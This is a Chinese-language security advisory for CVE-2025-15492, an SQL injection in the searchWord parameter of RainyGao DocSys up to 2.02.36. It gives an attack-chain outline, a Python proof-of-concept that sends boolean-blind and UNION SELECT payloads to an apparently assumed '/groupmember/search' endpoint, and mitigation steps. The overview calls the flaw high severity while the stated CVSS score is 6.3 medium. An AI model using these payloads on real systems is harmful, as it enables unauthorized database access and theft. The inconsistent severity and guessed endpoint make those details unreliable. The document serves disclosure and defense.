CVE-2025-15492 RainyGao DocSys SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15492

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

RainyGao DocSys

漏洞概述

CVE-2025-15492是RainyGao DocSys系统中存在的一个高危SQL注入漏洞。该漏洞影响了RainyGao DocSys从初始版本到2.02.36的所有版本。漏洞位于系统文件src/com/DocSystem/mapping/GroupMemberMapper.xml中的未知函数里，攻击者可以通过操纵searchWord参数实现SQL注入攻击。由于该漏洞可远程利用且不需要高权限认证，攻击者可以在低权限账户下发起攻击，成功利用后可能导致数据库敏感信息泄露、数据篡改甚至服务器完全沦陷。此漏洞已于2026年1月9日公开披露，厂商在收到安全通知后未做出任何回应，导致漏洞长时间处于未修复状态。建议使用该系统的用户立即采取临时防护措施，并关注厂商后续发布的安全更新。

技术细节

RainyGao DocSys的GroupMemberMapper.xml文件中存在SQL注入漏洞。漏洞点位于处理GroupMember查询逻辑的功能模块，当系统处理用户输入的searchWord参数时，未对用户输入进行充分的输入验证和SQL语句参数化处理。攻击者可以通过构造恶意的SQL语句片段，利用UNION SELECT、布尔盲注或时间盲注等技术，绕过前端过滤机制，直接与后端数据库进行交互。该漏洞属于OWASP Top 10中的A1注入类漏洞，CVSS 3.1评分6.3（Medium），攻击向量为网络层面，无需用户交互即可发起攻击，但需要低权限认证。成功利用后可能造成机密性、完整性和可用性方面的低等级影响，攻击者可获取数据库中的用户信息、文档数据等敏感内容。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标系统使用的RainyGao DocSys版本，确认版本号在2.02.36或更低

STEP 2

步骤2

访问GroupMember相关功能模块，找到包含searchWord参数的搜索或查询接口

STEP 3

步骤3

构造恶意SQL注入载荷，使用UNION SELECT、布尔盲注或时间盲注等技术绕过输入过滤

STEP 4

步骤4

通过低权限账户或利用认证缺陷，向searchWord参数发送包含SQL代码的HTTP POST请求

STEP 5

步骤5

成功注入后，攻击者获取数据库版本、用户名、密码哈希等敏感信息

STEP 6

步骤6

利用获取的凭证进行横向移动，可能导致服务器完全沦陷和数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15492 SQL Injection PoC for RainyGao DocSys
# Target: RainyGao DocSys <= 2.02.36
# Vulnerability: SQL Injection in GroupMemberMapper.xml searchWord parameter

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in GroupMemberMapper.xml
    The searchWord parameter is vulnerable to SQL injection
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url}/groupmember/search"
    
    # Malicious payload for SQL injection
    params = {
        'searchWord': payload
    }
    
    try:
        response = requests.post(endpoint, data=params, timeout=10)
        return response
    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

def boolean_blind_sqli(target_url):
    """
    Boolean-based blind SQL injection test
    Extract database version information
    """
    # True condition payload
    true_payload = "1' AND 1=1 -- "
    # False condition payload  
    false_payload = "1' AND 1=2 -- "
    
    print("[*] Testing boolean-based blind SQL injection...")
    
    true_resp = exploit_sqli(target_url, true_payload)
    false_resp = exploit_sqli(target_url, false_payload)
    
    if true_resp and false_resp:
        if len(true_resp.text) > len(false_resp.text):
            print("[+] Boolean-based blind SQL injection confirmed!")
            return True
    return False

def union_based_sqli(target_url):
    """
    UNION-based SQL injection to extract database information
    """
    # UNION injection to get database version
    union_payload = "1' UNION SELECT NULL,database(),version(),NULL,NULL -- "
    
    print("[*] Testing UNION-based SQL injection...")
    
    response = exploit_sqli(target_url, union_payload)
    if response and 'error' not in response.text.lower():
        print("[+] UNION-based SQL injection may be possible!")
        print(f"[i] Response snippet: {response.text[:500]}")
        return True
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/docsys")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] Target: {target}")
    print(f"[*] CVE-2025-15492 SQL Injection PoC")
    
    boolean_blind_sqli(target)
    union_based_sqli(target)

影响范围

RainyGao DocSys <= 2.02.36

防御指南

临时缓解措施

立即采取以下临时缓解措施：1) 在Web应用层添加输入过滤规则，对searchWord参数进行SQL关键字过滤；2) 限制数据库账户权限，移除不必要的数据库管理权限；3) 启用数据库审计日志，监控异常查询行为；4) 在应用和数据库之间部署WAF或IPS设备；5) 定期检查应用日志，发现SQL注入迹象时立即告警。同时建议隔离受影响的系统，避免内网横向渗透风险。